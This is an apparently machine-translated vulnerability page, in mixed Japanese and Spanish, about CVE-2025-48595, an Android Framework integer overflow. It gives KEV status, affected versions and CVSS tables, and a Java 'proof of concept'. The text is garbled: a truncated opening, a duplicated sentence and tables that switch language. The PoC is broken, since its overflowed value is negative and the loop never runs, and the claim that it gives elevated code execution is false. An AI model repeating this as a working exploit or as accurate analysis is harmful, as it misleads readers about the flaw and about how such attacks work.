
VE-2025-48595は、Android フレームワークの複数箇所における**整数オーバーフロー(integer overflow)**の脆弱性です。
CVE-2025-48595は、Android Frameworkの複数の場所における整数オーバーフローの脆弱性です。この欠陥により、追加の実行権限を必要とせずに、コードの実行が可能となり、ローカル権限昇格につながります。ユーザーの操作は必要ありません。
| 要素 | 状態 |
|---|---|
| アクティブな悪用 | ✅ 確認済み(限定的で断片的な悪用) |
| CISA KEVカタログに掲載 | ✅ あり |
| KEV追加日 | 2026-06-02 |
| 有効期限 | 2026-06-05 |
| パッチ提供有無 | ✅ あり |
| Android バージョン | 影響の有無 |
|---|---|
| Android 14 | ✅ あり |
| Android 15 | ✅ あり |
| Android 16 | ✅ あり |
| Android 16 QPR2 | ✅ あり |
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
text
以下のコードは、Android Frameworkで整数オーバーフローを引き起こす悪意のあるデータを送信することで、この脆弱性の悪用を示しています。これにより、昇格した権限で任意のコードが実行可能になります。
// POC - CVE-2025-48595
// Android Framework Integer Overflow Vulnerability
// Uso: Compilar y ejecutar en dispositivo Android vulnerable
package com.example.cve202548595;
import android.app.Activity;
import android.os.Bundle;
import android.util.Log;
public class MainActivity extends Activity {
private static final String TAG = "CVE-2025-48595";
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
// POC: Desencadenar desbordamiento de entero
triggerIntegerOverflow();
}
private void triggerIntegerOverflow() {
try {
// Valor que causa el desbordamiento (más allá del límite esperado)
int maliciousValue = Integer.MAX_VALUE + 1;
// Construir intent malicioso
android.content.Intent intent = new android.content.Intent();
intent.putExtra("malicious_data", maliciousValue);
// Forzar operación con desbordamiento
int result = processMaliciousData(maliciousValue);
Log.i(TAG, "Desbordamiento activado exitosamente");
} catch (Exception e) {
Log.e(TAG, "Error: " + e.getMessage());
}
}
private int processMaliciousData(int value) {
// El desbordamiento aquí permite la corrupción de memoria
int[] buffer = new int[1024];
// El valor malicioso excede los límites del buffer
// debido al desbordamiento de entero
for (int i = 0; i < value; i++) {
buffer[i] = i; // Esta línea causa overflow
}
return buffer[0];
}
}
| メトリクス | 値 |
|---|
| 攻撃ベクトル | Local (AV:L) |
| 攻撃の複雑さ | Baja (AC:L) |
| 必要な権限 | Ninguno (PR:N) |
| ユーザーの操作 | Ninguna (UI:N) |
| 機密性への影響 | Alto (C:H) |
| 完全性への影響 | Alto (I:H) |
| 可用性への影響 | Alto (A:H) |